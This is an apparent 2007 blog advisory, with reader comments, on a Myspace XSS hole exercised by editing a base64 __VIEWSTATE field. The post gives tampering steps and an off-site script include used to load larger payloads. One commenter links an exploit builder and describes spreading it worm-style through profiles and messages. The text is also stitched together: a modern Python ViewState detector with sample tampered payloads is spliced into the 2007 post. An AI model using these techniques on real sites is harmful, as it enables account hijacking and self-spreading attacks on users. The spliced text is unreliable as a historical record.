M.O.M.B.Y! ([info]momby) wrote,
@ 2007-04-19 22:04:00
Current mood: chipper
Entry tags:ajax, base64, xss

MOMBY-00001111: Myspace FriendsView.aspx "__VIEWSTATE" POST XSS

Noobz: **
LOLz: ****
0wnz: *** 1/2


An interesting find: this is an Ajax control present on all "View Friends" pages. It is useful for POST-based XSS attacks (which usually require a form posted from an off-site page in order to trigger), and the vulnerability is exercised in a fashion similar to MOMBY-1001.

First, a simplified attack form for demo purposes:


This can of course be modified to be a one-click or onLoad submit action, requiring only the page to load in the victim's browser. Screenshot of the above form in action: http://pics.livejournal.com/momby/pic/0000hw8z

In order to modify the vulnerable parameter, some base64 encoding and decoding is required. This is easily accomplished with many b64 encoders, one of the easiest to use being the online encoder at http://www.motobit.com/util/base64-decoder-encoder.asp. An attacker may take the __VIEWSTATE value, decode it and save the binary, then edit the section at offset 0xdb with his favorite hex editor. This is a standard TLV (type-length-value) node that supplies the text displayed in the Friends header box, for example |05 10|Tom's Friends... (|05| being the type and |10| the length, decimal 16, which is the length of "Tom's Friends...").

Once that's complete, the attacker may re-encode the resulting file back to a single-line base64 format, and voila! An exploit that is not only completely unfiltered at Myspace.com, but is basically impossible to detect by any other means, such as third-party XSS-filtering proxies or browser add-ons (the stealth is worth at least a half an 0wn right there).

This form and its related Ajax cousins are a rich area of unfiltered exploitation, as it is not an obvious vector for most casual XSS bug-hunters. We here at M.O.M.B.Y! hope the original reporter will take a moment to explain further his methodology in finding this bug using the anonymous comment section of this journal.

Note, though, that attackers are limited to 127 characters, as the length parameter is a signed single-byte integer. That's plenty of room for evil, though; recall that elements referenced from other sites (such as <script src="www.example.com/whatever.js">) run in the same context as the originating page, so complex scripts need not fit within the 127-byte limit.
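As an added, defender-side example (not the advisory's or Richtr's code), the script below decodes a posted __VIEWSTATE, walks string nodes of the |type|length|value| shape described above, flags any whose text carries HTML markup, and rejects length bytes above the 127 limit. The walker is a simplified model built only from what the advisory states (type 0x05 string nodes with a one-byte length; other node types are assumed to carry a single byte) rather than a parser for the real ASP.NET ViewState format, and the blobs are constructed samples.

```python
import base64
import re

STRING_NODE = 0x05   # node type the advisory shows carrying the header text
MAX_LEN = 127        # the advisory notes the length byte is a signed single byte

# Constructed sample blobs (NOT real Myspace/ASP.NET ViewState): a made-up
# leading node, the string node from the advisory, and a made-up trailing node.
BENIGN_BLOB = b"\xff\x01" + b"\x05\x10" + b"Tom's Friends..." + b"\x02\x28"
TAMPERED_TEXT = b'<script src="//example.com/whatever.js"></script>'
TAMPERED_BLOB = (b"\xff\x01" + b"\x05" + bytes([len(TAMPERED_TEXT)])
                 + TAMPERED_TEXT + b"\x02\x28")
BENIGN_VIEWSTATE = base64.b64encode(BENIGN_BLOB).decode()
TAMPERED_VIEWSTATE = base64.b64encode(TAMPERED_BLOB).decode()
OVERLONG_VIEWSTATE = base64.b64encode(b"\x05\x80" + b"A" * 128).decode()

def parse_nodes(blob: bytes) -> list:
    """Walk the simplified TLV stream and return (type, value) pairs.
    Non-0x05 types are modelled as one-byte values (an assumption)."""
    nodes, i = [], 0
    while i < len(blob):
        t, i = blob[i], i + 1
        n = 1                               # value width for non-string nodes
        if t == STRING_NODE:
            if i >= len(blob):
                raise ValueError("truncated length byte")
            n, i = blob[i], i + 1
            if n > MAX_LEN:
                raise ValueError("length %d exceeds the signed-byte limit" % n)
        if i + n > len(blob):
            raise ValueError("truncated node value")
        nodes.append((t, blob[i:i + n]))
        i += n
    return nodes

# Markup that has no business inside a friends-list header string.
MARKUP = re.compile(rb"<\s*/?\s*[a-z]|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)

def find_markup(viewstate_b64: str) -> list:
    """Decode a posted __VIEWSTATE and return the string values carrying markup."""
    blob = base64.b64decode(viewstate_b64, validate=True)
    return [v.decode("latin-1") for t, v in parse_nodes(blob)
            if t == STRING_NODE and MARKUP.search(v)]

def is_well_formed(viewstate_b64: str) -> bool:
    """True when the blob decodes and every node respects the length rules."""
    try:
        parse_nodes(base64.b64decode(viewstate_b64, validate=True))
        return True
    except (ValueError, IndexError):
        return False
```

A check like this only supplements the real fix, which is server-side: ASP.NET rejects tampered ViewState outright when MAC validation (enableViewStateMac) is turned on, so the edited blob never reaches the page.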

Credit: Richtr first reported this bug. He also claims that forms such as these may be embedded in a personal profile Friends page, implying that this can be used to launch an XSS worm. We haven't tested this implementation.




Niiiiice.
(Anonymous)
2007-04-20 03:46 am UTC (link)
This is the kind of bug that I've been waiting for.

(Reply to this) (Thread)


(Anonymous)
2007-04-20 09:03 am UTC (link)
Hey,

Firstly, for anyone wanting to test this who doesn't want to mess with base64, I made a program:

http://rapidshare.com/files/26941067/Create_Exploit.zip.html

Which does all the work for you (needs .Net2.0)

Secondly the other pages on myspace affected by this bug are:

-Pics
-Comments
-Messages

I believe others are also infected but I haven't taken the time to test them.

The way I suggest using this exploit is that the form CAN be placed on your myspace page, all the code required is allowed to be put in your profile. So simply to spread this bug all you need to do is either:

1) Replace links on peoples pages with exploited links or.
2) Message the form around saying "Hey look at my comments: link" and once they click they will also be infected.

These viewstates can be used for other more legit things too, such as changing the amount of friends shown per page from 40 to 100.

Richtr

(Reply to this) (Thread)

Very very nice
(Anonymous)
2007-04-20 01:58 pm UTC (link)
Nice job Richtr
http://sni-labs.com/MOMBY
.Net Framework link:
http://microsoft-net-framework.softonic.com/descargar

(Reply to this) (Parent)


(Anonymous)
2008-05-31 12:04 am UTC (link)
This is also used in adding friends now. B64 decoding, though, gave me slightly unusable code. I gave up on trying to figure out what to do with it, since at this point that seems useless in any sort of exploit. I've been wasting days on reading old captcha exploits, so fed up with this shit.

(Reply to this) (Parent)


MOMBY-00001111
(Anonymous)
2007-04-20 01:17 pm UTC (link)
Nice one! It is a hardcore XSS vulnerability (and PoC for it). Well done Richtr.

About the other holes with this vector (Pics, Comments and Messages) in addition to FriendsView: you need to test them (if I find time I'll look at them). For new bugs for MOMBY.

> He also claims that forms such as these may be embeded in a personal profile Friends page, implying that this can be used to launch an XSS worm. We haven't tested this implementation.

We need to examine and test this possibility, because an environment for an XSS worm is a big security issue.

P.S.

About base64 encoding. Besides www.motobit.com's encoder/decoder (and others) you can use my XSS Generator http://websecurity.com.ua/xss_generator/ (for encoding).

Best wishes & regards,
MustLive

(Reply to this)

Patched?
(Anonymous)
2007-04-20 05:27 pm UTC (link)
Is this patched? I copied, pasted, saved as html, and submitted but nothing happened. I replaced the third field with a basic alert (in base64 format) but it didn't run. Thanks for revealing the bug either way!

(Reply to this) (Thread)

Re: Patched?
(Anonymous)
2007-04-20 05:54 pm UTC (link)
Not patched yet. This hole still works (in my Mozilla and IE6). The message with the picture of Hemu Nigam is displaying.

So try again to see it.

Best wishes & regards,
MustLive

(Reply to this) (Parent)

Re: Patched?
(Anonymous)
2007-04-20 07:33 pm UTC (link)
Not seeing it anymore. Was a good find none the less. Can't figure out how to implement this to where it would be effective without user interaction though.

(Reply to this) (Parent)(Thread)


Very Nice Find
(Anonymous)
2007-04-20 09:04 pm UTC (link)
Keep up the great work, this is not only a good find, but it's very interesting as well.

(Reply to this)
